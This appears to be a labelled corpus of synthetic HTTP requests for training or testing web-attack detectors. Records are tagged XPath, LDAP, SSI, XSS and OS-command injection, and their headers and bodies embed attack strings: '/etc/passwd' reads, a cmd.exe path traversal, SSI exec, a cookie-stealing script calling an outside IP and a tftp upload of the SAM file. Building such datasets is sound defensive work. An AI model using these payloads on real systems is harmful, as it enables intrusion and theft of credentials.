Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest qop=auth-int
Range: -8,89-
Referer: /Wcaeht/lieeu4i/nictsil/ranote/onlxeas.pdf
TE: trailers,trailers,chunked
Trailer: From
User-Agent: Mozilla/3.4 (X11; U; Linux i586 9.7; Te-ei; rv:9.3.1) Gecko/96373611
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4671x382
Via: 9.5 214.176.0.28:6399, FTP/5.2 www.nsej.png:9, zaeuRq/9.2 www.pybkrou.htm
Transfer-Encoding: compress
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47463
Start - Id: 49613
class: XPathInjection
GET /ttsHny/4yHiQF-ZqbV.nsf?gAydeletek=ntfaa3%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++%27doretocs%27+%3D++%27 HTTP/1.1
Host: 214.18.55.44
Connection: rEEnerba
Accept: text/*, text/xml, video/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.6, compress, identity;q=0.4, identity;q=0.9, compress;q=0.4
Accept-Language: iino-ypt, MtnsviX-ffh
Cache-Control: no-cache
Client-ip: 124.225.114.247
Cookie: yes=haincludedas;yttmiit=28133446;EnnfeS=dehAhym44si
Cookie2: $Version="006"
Date: Tue, 01 Dec 09 17:55:54 CET
ETag: W/"baj@.7Mq2NB-WyuTN"
Expect: 100-continue
From: rrm2hTst@reeb.net
If-Modified-Since: Fri, 09 May 08 08:35:37 GMT
If-Unmodified-Since: Mon, 31 Oct 05 17:37:20 GMT
If-Match: "T.1cbwN9_jWIQdxk"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 244
MIME-Version: 5.6
Pragma: a6=tt
Proxy-Authorization: NTLM bGN0bmlwc25pbjdicmlkNW10ekFjZXRuYWxhdWVpZWVo
Authorization: NTLM ZW9jZWdlYXQzaWVGYmFqZW9udDZnZm9pNXJhcjR4Y0Rpc3VT
Range: 7852-
Referer: http://0mih.ch/eowRn9dp/MdtC/gfnewa.mp3
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/1.4 (compatible; hseRbesvr; Linux i586; n2edtT; ecidnSe; iNsaOwrrtU)
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 0.2 www.Sdwie.jpeg, 0.9 www.atittal.jpeg, jaRAw/6.4 204.122.228.249:3
Transfer-Encoding: identity
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49613
Start - Id: 37507
class: LdapInjection
PUT /goa0EgheNrbahmR.mspx? HTTP/1.0
Content-Length: 189
Content-Language: mses,s2eoi,y6h
Content-Encoding: identity
Content-MD5: bTlpZWU2TG9vZGlockxvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Aug 06 04:01:13 UTC
Last-Modified: Mon, 18 Apr 05 15:28:12 UTC
Host: www.e6ywaowf.fr:6
Connection: keep-alive
Accept: image/*, text/*, video/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: achaN4H-O3ot;q=0.2, 7sE-e62ijej
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Date: Mon, 20 Jul 09 16:53:13 UTC
If-Unmodified-Since: Fri, 30 Jan 09 09:03:16 UTC
If-None-Match: *
Max-Forwards: 28
MIME-Version: 0.6
Pragma: mbfulq=satadsm
Authorization: rhos4a rmmaoct=ndtnr
Referer: http://c5emosb.st/fecoJ/ostg/RseR2oi/czdSSguq.zip
Trailer: Expect
User-Agent: fsihveyl6e/7.2
UA-Pixels: 2665x9772
Transfer-Encoding: compress

usrimgjPO4wC=96)(&(objectClass=hgd)(|(sn   =ebd)(cn=teen     J*))&ecenwnoalhwfys=neEt=&0_1yC=n0aete&q5.3=r-EQ5ZYcc3&tenMene5ot=d69y&sb8x= sH4allzsaeservicesm

End - Id: 37507
Start - Id: 36878
class: LdapInjection
GET /fkobject2ktoWoptaHC2-/aynedd6Rceb2wo/conreatiklhecmdhg90/1c@4/fexhsn5hrg.php4?e6mudhenio=1sd&cl4Gqvdy=agarSuaIwtepot&ddnyiel9ibnaOas=leE6bxsiqqer&imtisnncp=cthd%7EescriptToop3cs&lfaeeeide=11&R8@CUr0@rd=rvgDS&teomdSihesk=417566&sutm=7948860730&otekhhigg9=1 HTTP/1.0
Host: www.oRcio.it
Connection: close
Accept: audio/basic
Accept-Charset: euc-kr;q=0.9
Accept-Encoding: identity, compress, compress, deflate
Accept-Language: tereo-ooiI;q=0.2
Cache-Control: no-store
Client-ip: 154.207.127.41
Cookie: thhyvti2eisdde=)   (|  (    cn=*o    'brien*)(mail    =*o 'brien*    ) 
Cookie2: $Version="86"
Date: Sun, 18 Oct 09 16:02:45 CET
ETag: "qe6AfZpd-4X.4-V"
Expect: 100-continue
From: hlie@ettef.de
If-Modified-Since: Fri, 09 Dec 05 07:53:09 CET
If-Unmodified-Since: Mon, 22 Mar 10 23:08:40 CET
If-Match: "q8DL.4YZI.BvGe5"
If-None-Match: *
If-Range: Tue, 25 Jan 05 05:29:00 CET
Max-Forwards: 1037
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: tittt SszhsJl=itA3crq
Authorization: 9neoo Ziuic=aebteoqh
Range: -348635
Referer: /e6iiEiH8.swf
TE: trailers
Trailer: If-Modified-Since
User-Agent: zDtsmrhan/0.6.9.2.1
UA-Disp: 1108,5014,32
UA-OS: Win9x
UA-Pixels: 5144x8238
Via: HTTP/0.3 www.Ao4snmah.tiff, FTP/1.5 96.238.82.134
Transfer-Encoding: deflate
Upgrade: nrT/9.9
Warning: 328 71.142.30.136:77389 "ttnaaextoqsiIoo" "Fri, 15 May 09 15:18:30 CET"
X-Serial-Number: 0500322312

null

End - Id: 36878
Start - Id: 48482
class: XPathInjection
GET /g4elonyeqhuo/ttt15tlhieehIe/pi0/eoiusswnhcvwNeat/rigCy/t-h1ESY6r@biYwTq.htm? HTTP/1.1
Host: www.emihw.ch
Connection: close
Accept: */*
Accept-Language: nzhO-Mucndear;q=0.6, bpi2fox-snxNt, sittr-aotiils, Eses-no;q=0.7, ut-49od
Cache-Control: no-cache
Cookie: e4an=SkadoDitrehronloc;rgje=ia' or  6  <     count(path/child::*)    or    'liNnaane'  =    '
Date: Sun, 17 Jan 10 07:32:58 CET
If-Unmodified-Since: Sun, 06 Jun 04 21:51:56 CET
Max-Forwards: 5
Pragma: teun=meleh
Range: 661652-,3525-0062,58-
Referer: /auarnga/oeEhigep/sig9trac.jpeg
User-Agent: f2viesq
Via: f51zr/6.2 61.91.198.130:22016
Transfer-Encoding: nyAGee
----: ----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48482
Start - Id: 35663
class: XPathInjection
GET /Oe.MivGZTGofhaving/hjxQnQkbLWt_Z5Tl/m2FeeqBgm30t1aQ.e.Y/pW6xRB6@xUo/fWwihMXlrH/itjI.htm?thY6k=tswiealroddacy&mssOa7t4hhhuatr=mtflhuiUe&fotnseEvn=dealeoHa&riparf=5RE&BXyVFnssGidH=8Tpgec%2Flaeoy%2Fe3t%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D888%5D+++++%7C+yat%2Fis%2Flerzr%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D++or+++%27fe%27+++%3D%27&ptrotr=Dsg&toamsah=smIr4J7aRqU&pnme0i1syid=82893&troseStcnds=pam79ehA0sekhhdu&4enshcs55et5h2s=ee%24%7Cw&oa3R4seat8f=vbe7rthgy%7Cti&lyi8or=nmi HTTP/1.0
Host: 23.33.139.113:80
Connection: close
Accept: text/xml;q=0.6, audio/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: bwc-ses5;q=0.9, ieoaPrc-p;q=0.7
Cache-Control: max-age=797
Client-ip: 251.134.194.89
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="392"
Date: Thu, 29 Mar 07 09:34:54 GMT
ETag: "ZlkPwB.fZ8gRRFjF"
Expect: 100-continue
From: ww8pwu@domnehliio.uk
If-Modified-Since: Fri, 02 Nov 07 02:01:14 GMT
If-Unmodified-Since: Sat, 01 May 10 15:52:21 GMT
If-Match: "D7A_v3.3WyzcJu5ZdPIm"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic ZXRvOTpyeXJSaWk2cg==
Authorization: aakb lusm=bracclh
Range: -5103
Referer: http://ehssa.de/icbthurh/mAsaj4ot/4meiD1ur/1aa2ahy.png
TE: gzip;q=0.3
Trailer: User-Agent
User-Agent: 2hgesRE (eyQJaVC; eUxkyD; syDnQh9)
UA-CPU: Sparc
UA-Disp: 464,9739,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: ienf/4.5 www.tbib.js
Transfer-Encoding: deflate
Upgrade: alcth4/9.0, omen/8.5
Warning: 803 161.22.234.22 "nydhoO5peei7" "Wed, 08 Feb 06 21:10:39 CET"
X-Forwarded-For: 168.165.190.35
X-Serial-Number: 24734
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35663
Start - Id: 40612
class: SSI
GET /sock_streamrcpwY-kfLhnAupdateH.shutdown/aknN/z3mMldqhj7G8yai/fWr0-gWJGrDDFFvFmu/hcX.gif?ae=enekan7broya&dishhipnidiWas=%3C%21--+%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E&tzbeMci=gsl&lC0aAo4_Maccess_logOA=eti&12et1too=wfrns%3DmH&vvsaqSOGSa=e%3Eao3utiprocessing-instructiongBo HTTP/1.1
Host: www.mMhe.com
Connection: close
Accept: image/gif
Accept-Charset: iso-8859-7;q=0.5, koi8, cp-936, iso-8859-6;q=0.2, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: tj-dbiA;q=0.8, tLlee-np;q=0.2, 7-redfnyen;q=0.9, baoe-8t
Cache-Control: no-transform
Client-ip: 93.243.241.46
Cookie: ayfgr2iia8ho=1dzaTCy9Kl3j;ioidvakeePdtiwa=0115496;iWedka11etco8=ct;Ueauhshwienae=n@tZm3S6V;oajeqgreqit=538471
Cookie2: $Version="252"
Date: Wed, 19 Mar 08 08:43:56 CET
ETag: "GwJ5.ecb9U1xVkZx"
Expect: 100-continue
From: mObarai@oDeniipebe.it
If-Modified-Since: Wed, 10 Feb 10 04:40:00 UTC
If-Unmodified-Since: Sat, 17 Sep 05 24:23:05 CET
If-Match: *
If-None-Match: "2dT5D-vtaabb8Qb@FHrd"
If-Range: "8pQHSr.DftHvE8F1MEM"
Max-Forwards: 34
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ZbHRmc2poZ3RadG5ocG5jb2Nuc3RpaXJMRW9hdGM=
Authorization: Digest username="ednha"
Range: -916,8-,-198241
Referer: /mrar/aldLt/9neIiD4.dll
TE: trailers
Trailer: Expect
User-Agent: Mozilla/9.9 (compatible; ut49b; Linux i386; 2nyosi9g1s; gqcu6l; lpeseom)
UA-CPU: PowerPC
UA-Disp: 116,2183,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 367x571
Via: HTTP/1.8 150.171.122.94:25155
Transfer-Encoding: y7tA
Upgrade: aen/7.4, rd7in/6.7
Warning: 304 www.eueCo.tiff:16 "IcolrcmeCtIstSoht5ne" "Sat, 07 Jul 07 14:18:42 CET"
X-Forwarded-For: 5.3.246.86
X-Serial-Number: 0848613920149750
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40612
Start - Id: 37965
class: LdapInjection
GET /wOiiNp0flh/nHH/dtd3C7DMFgnjG@9sG/yihiascaeptccy/tJxcJE/RhtnJWeRUdtrIQQ/streaioad/wlsornm/kYinVjqAvO3R/kF2kHB5yU5@IlHmPX86Y/eKSh/OifrvetendDab.html?2miMA=osh&M_V97dTdocumentperl=mnZBMtXA&beel=mboE&9i=ot%2Feg&n6enkae9ee=8&sxde=mntyosf&naiCj=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eetwulawiru5=59221 HTTP/1.0
Host: 229.93.173.251
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 177.141.172.83
Cookie: gatw2arta4if=eedeletee(aurJecho:e $r;rt5IenemrLsI=bJDck;O8aRdvbscript=775855342;spees=830473;slqoudeiio3=6;nfpaOAn=eCKnqH59N
Cookie2: $Version="12"
Date: Fri, 05 Mar 04 12:13:26 GMT
ETag: W/"l5kqXBDpFxLgZiUAxf"
Expect: 100-continue
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Sun, 17 Aug 08 12:55:10 UTC
If-Unmodified-Since: Fri, 30 Sep 05 08:11:49 GMT
If-Match: "LvuOuCqs2pFjyYMp0ml2"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 928
MIME-Version: 8.4
Pragma: upmui=a3yvt
Proxy-Authorization: Digest qop=auth
Authorization: NTLM UmV0aGlwb3Jzc2VpYWxyaTNpb2ltRW1PYTdxZXRwbmRHbWU4Ng==
Range: -8,482604-
Referer: http://www.3o4tont.com/5bifNg/ueumdyq/suslos.asp
TE: trailers
Trailer: Warning
User-Agent: sndmcRiOstrGajsmtan
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.5 www.iwrotsoe.htm, 6.3 128.119.10.91
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37965
Start - Id: 40206
class: SSI
PUT /9fw0Yg_ofKwET/sdjOGVWMQpq/ed5.html? HTTP/1.0
Content-Length: 276
Content-Language: fenm,hnqvoal2,na9
Content-Encoding: deflate
Content-Location: http://l7tn4i.com/rubzheLh.asmx
Content-MD5: MXR0R3RlbG9lbGxycXRhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Dec 07 06:09:49 CET
Last-Modified: Mon, 01 Nov 04 14:51:25 GMT
Host: 179.194.35.50:9618
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, utf-8
Accept-Encoding: <!  #<!--     #exec  cmd="id"-->
Accept-Language: retsiimf-bfletg;q=0.6, lcoe-2eIrmdp, eoNeo-rdvdg;q=0.7
Cache-Control: Ebhnaa='epol'
Client-ip: 88.227.11.41
Cookie2: $Version="41"
Date: Thu, 09 Jul 09 15:28:04 GMT
ETag: "WEiwQapYnYvz0Wx"
Expect: rawtes
From: etts@eLn7nndNa.fr
If-Unmodified-Since: Sat, 21 Jul 07 17:59:04 CET
If-Match: "CZHrw-DJdQNq2p6dI"
If-None-Match: "2yui..KVlLq7_Pl"
If-Range: Tue, 15 Apr 08 14:01:34 GMT
Max-Forwards: 3
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest username="osnHAt"
Authorization: Basic dWlhMmVsOmRoZDhlZHhl
Range: -503,356-,-44225
Referer: http://www.acsenae.de/ni9vCo/Hq6thTp/eiterRbo/eq0luafs/TNaiie6.shtml
TE: gzip
User-Agent: rW7-3ZtE http://www.EefsN3to.it
Via: HTTP/5.1 176.121.174.30, 9.8 www.iyss.html, stp/4.6 76.138.129.178
Transfer-Encoding: compress
X-Serial-Number: 2474361
~~~~~: ~~~~~~~~~~~~~~~~~~

ieA6Ee27mati4=ntaredss&ssehroaehmmif=0oNspassthrumochaN6de&sooea8M=8773&58ddb89wp-=057311&syEs=g&9Myy.YIg_=1 %node sippaAG&tEnM4iitldtofeh=gP Caxe u&PspMAe='sTdeRu&WRS2NY4kaI=173&4iO21FechowmetaYT=243473&edgagsFfuji6s=457&eUgroup by_BiO_Z= d&dmrDsrthwc=qbIaq&6b6MhNe=27524

End - Id: 40206
Start - Id: 48994
class: XPathInjection
GET /5yF1np/ntSiil/u59Sz3R1/hkaErseEia3tdre0att/tK9J/ti2._D5hSx9M/W1H1sojCreplaceQ@/sATHMB-Ly5s34DYYl0eo/BYC/eljhIbetOegoci/eseYneG/oe1jih.jpg?swscbsplksrnaaa=itIn&ypSvv1=mseghocochtectt&qsnsnedweBp5d=6metadvc%24&iuIHlnUt3=isl8etnelheasi&lol3a=t4F9wA6gU&thw2=ro%3C1io%7CEVo&Ado78Y_6=ms3KwHcB&zsds0hevTs5lwi=idleaO&i8Ae1oe=000++or+++++ds%2Ftb7c6%2Fkeo%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D4%5D+++++or+++24156%3D HTTP/1.0
Host: www.osdr4cun.gov
Connection: ka6lIstn
Accept: video/*
Accept-Charset: windows-1253;q=0.8, iso-8859-1, windows-1251;q=0.4, macintosh;q=0.5
Accept-Encoding: identity, identity;q=0.1, compress;q=0.2, gzip
Accept-Language: bg7eafd-gesB9;q=0.0, LG-aasn;q=0.7, umqeirt-ircn;q=0.8
Cache-Control: no-store
Client-ip: 102.111.118.138
Cookie: dsi1yu20hi=848;Sie=rnd\tisystemlrrc
Cookie2: $Version="778"
Date: Thu, 18 Mar 04 13:53:56 CET
ETag: W/"c@KYsDDHEulcjRLzw"
Expect: 100-continue
From: hTposhor@lpiuhs.biz
If-Modified-Since: Fri, 19 Nov 04 17:31:39 UTC
If-Unmodified-Since: Wed, 17 Nov 04 06:52:48 CET
If-Match: "UBPCIdywR91P6n.s-bK"
If-None-Match: "1MnP-BOkAvamJRNfNEi"
If-Range: *
Max-Forwards: 385
MIME-Version: 9.9
Pragma: e3pibbai='eod'
Proxy-Authorization: 1mml leiEsi=hessd
Authorization: Digest opaque="iwaw"
Range: 23-,057-,45-
Referer: /nmptygus/eulsvmTa.css
TE: deflate;q=0.0
Trailer: From
User-Agent: ynvEStWyro (lA7Q8O@WSH; dzYhTaeAs)
UA-CPU: 68000
UA-Disp: 8493,346,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6996x6974
Via: HTTP/8.6 www.nric.html
Transfer-Encoding: compress
Upgrade: ttdCe/0.8, oa8sie/8.1, wteoa/2.2, Lsat/9.3
Warning: 728 157.50.122.194 "mlteR2oivlsnuennt" "Wed, 05 Jan 05 24:55:15 GMT"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48994
Start - Id: 46689
class: XSS
GET /whe.exe?YT28Jfe8ROcd=%26et%5D+iuddn%7Ezrs%26h7&csIpoe4itfhncss=4740&rTin=a&Nk.@fB=961478&zlnapviiy8irs=flsqd HTTP/1.0
Host: www.iuthhHs7cx.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: frui4dhe-iwrke
Cache-Control: max-age=8020
Cookie: udto=<img   src =   "   mocha:[window.open('http://184.230.77.185/it.cgi'+document.cookie);]       "  >
Cookie2: $Version="86"
Date: Wed, 12 Mar 08 08:31:29 UTC
Expect: 100-continue
If-Unmodified-Since: Sat, 02 Aug 08 18:39:53 GMT
If-Match: *
If-Range: Sat, 12 May 07 22:54:14 GMT
Max-Forwards: 306
Pragma: imr0asli='im'
Authorization: Digest opaque="lsnnt6"
Referer: http://www.toeotgge.org/chnte3nt/Eyre/fdero.jsp
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 1.3; nr-r5; rv:1.3.3) Gecko/91583149
UA-Pixels: 9266x0472
Warning: 104 www.tos7l9.gif "agNmpea" "Tue, 01 Jun 04 12:05:40 GMT"
----: ------------------------------------------

null

End - Id: 46689
Start - Id: 43537
class: OsCommanding
GET /idqlmt1tcter/n2ApZ1.tiff?nt=SaSpelOoe&rkuavz=734025&ded=eFphp%7CbTdgroup+byinpEsscriptSa-between%3F&Daosomaa=ibdzha&nnssgndebssIe=%7C+++cat+++++%2Fetc%2Fpasswd&5cc=idzt&qw6etjcr5i=2&a5a=55&lito0Ia=eCmzHl_ HTTP/1.1
Host: www.ewroHNI.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad, x-mac-hebrew;q=0.2
Accept-Encoding: compress, deflate;q=0.7
Accept-Language: *
Cache-Control: max-age=14617
Client-ip: 214.70.1.175
Cookie: 3uedropbE=9208;IM1tagrrr=hap-Ca;weobfrl1tc=yT8 sio e$v
Cookie2: $Version="9"
Date: Tue, 03 May 05 05:47:06 UTC
ETag: W/"IRDWyMlE6.clcPc7DJep"
Expect: hhdoic
From: kewtae@taheisd.de
If-Modified-Since: Mon, 11 Feb 08 09:41:16 UTC
If-Unmodified-Since: Mon, 12 Apr 04 06:57:00 CET
If-Match: *
If-None-Match: "8ghp6dkd5PT6QcxKx3jU"
If-Range: Fri, 07 Apr 06 06:14:10 CET
Max-Forwards: 49
MIME-Version: 1.5
Pragma: renh6='EEo'
Proxy-Authorization: Basic c2NndDpFRWhiaHQ0
Authorization: 2wgtl ehdncs=dunee
Range: -983461,45-31195
Referer: http://swino.biz/NnbipLs/dt0r/tlElT.wmn
TE: chunked,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 5.3; 9d-id; rv:8.0.8) Gecko/18915818
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5688x504
Via: HTTP/6.5 187.108.152.187
Transfer-Encoding: identity
Upgrade: 5aRp/4.4, fqts/9.9, eeo/3.4, hho/0.4, pitko/1.5
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 00610632074
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43537
Start - Id: 37088
class: LdapInjection
GET /NQY.ZNX/tIBZqLKfK9Ay3WFbdiX.mdb?kEtmxsn=76419&wleetgore=n9window.openm&4brTcltoedbge2=89372&Y11Cx_bin=r4t&q5nhlP1zLF=350159&Seiidie=laotg2trdsutt6Ntnr&slnoe=6_EAYbcbrw&d9erbss=mjr%2Fdijn%29hrae%5D&pboisgs=7061%29%28%26%28objectClass%3DLom%29%28%7C%28sn+%3D+++g3hr%29%28cn%3Dnrgw+++++J*%29%29&rbet1a=6856383102&atBu=usketiarmnOezk%7C&Ncat7@=9aepr8e&esYePh5pOy=da&eagtft=mSpassthrua&nsq=div2childtadre%3Ce HTTP/1.0
Host: 95.23.238.74
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: ls=el
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="6"
Date: Tue, 13 Jan 04 11:08:07 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: 0res@4luu6h.st
If-Modified-Since: Wed, 28 Sep 05 09:23:58 GMT
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: "ZtapEphV2gNgqeiD3C"
Max-Forwards: 8464
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic MmFnY2FlOmR0ZVNpZDhh
Range: 145-
Referer: http://deuoarp.st/eror/goleomet.mpg
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 2.8; ea-np; rv:5.2.2) Gecko/89692014
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 997 www.raeb.htm "tslwaeaovnN5em24i" "Fri, 27 Jan 06 03:45:51 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37088
Start - Id: 36432
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 23.48.25.94
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: gzip;q=0.7, identity;q=0.7, identity;q=0.0, deflate
Accept-Language: *;q=0.6
Cache-Control: min-fresh=1220
Client-ip: 250.107.116.23
Date: Sun, 04 Jun 06 20:58:25 UTC
ETag: "RKPYU8tNuJue3c_"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Mon, 16 Nov 09 23:26:40 CET
If-Match: *
If-Range: Mon, 04 Apr 05 08:15:50 GMT
Max-Forwards: 5145
MIME-Version: 0.7
Pragma: ons0xyr='imf'
Referer: http://www.t8netgs5.gov/o7kbeeg/smae.mdb
TE: deflate;q=0.4
Trailer: Trailer
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 8.5; mk-ss; rv:9.6.4) Gecko/75992717
UA-CPU: PowerPC
UA-Color: color16
Transfer-Encoding: heUo; qzNau=Cdeo
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36432
Start - Id: 44565
class: OsCommanding
PUT /vm.mspx? HTTP/1.0
Content-Length: 309
Content-Language: nO,cnue1,aEetp4dr
Content-Encoding: deflate
Content-Location: /ssrdLi0/toslRwil.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Host: www.ujhauuaodh.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.1, deflate
Accept-Language: eYMfard-ib, ausr7wd-nrraorr;q=0.0, im-e3dnmme, Ycv-dcm;q=0.8
Cache-Control: min-fresh=99
Client-ip: 10.34.240.53
Cookie: h3T6sa0lt0nRrn=execn hsbetweeneen:6seval8ui|6e;foognO=noeoEandhconurt;waotHhr6i=ayn;ixjd=29;AOSeMfrom=:ae07re7)rdie;bho8enAewrteue=kzE92D0
Date: Fri, 24 Dec 04 23:18:41 CET
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sat, 20 Aug 05 19:50:16 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: *
If-None-Match: "xoLBvkp7@itHq1eZ-"
Max-Forwards: 0
MIME-Version: 9.6
Pragma: no-cache
Authorization: Digest username="lTri"
Referer: http://www.nrevsf.uk/rdto/tm3ntj/crRbd/mooEtHar/ooxngen.gz
User-Agent: fitnomghd (cB3@Kr; tmFQy-N0Od; rt7ecl)
Transfer-Encoding: compress

heoii=ehWNhs&7qqjalinknetcat6HM=286398&ulweri=52604770&jmezSq=n1uamt7sem8hatnllt&samxjkG018=emiig3rallt&jGGLBboot.iniu.xMs=ns&ucvmUheajaf1=94.162.144.62|     tftp  -i     101.190.78.201  PUT sam._&eu1amg8Iutad=nohr6&ce3seo8Bnsl=96&oe9mraaSfmunt=4925&nOfGtol=T4kn&nrhib=so+8o&UYA3y=eai5o|6tgevtncmdnco[

End - Id: 44565
Start - Id: 37061
class: LdapInjection
GET /bpa.dll?9kTbRmochaJb4=4133&0fUm=73872188&AOJ9MWoAqnj2=697422&inEZ9ub6VCR6=910%29%28%26%28objectClass%3DCgNt%29%28%7C%28sn%3D4hs%29%28cn%3Donge+++J*%29%29 HTTP/1.1
Host: www.sdetejoeyN.de:15
Connection: keep-alive
Accept: video/*;q=0.6, video/*, video/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 229.87.115.154
Cookie: ule=tsgLrwr
Cookie2: $Version="6"
Date: Tue, 10 Apr 07 18:05:47 CET
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 497
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: /syswt3d/aefts.png
TE: gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/5.4 (compatible; MSIE 0.5; Win 9x; urwpaea)
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
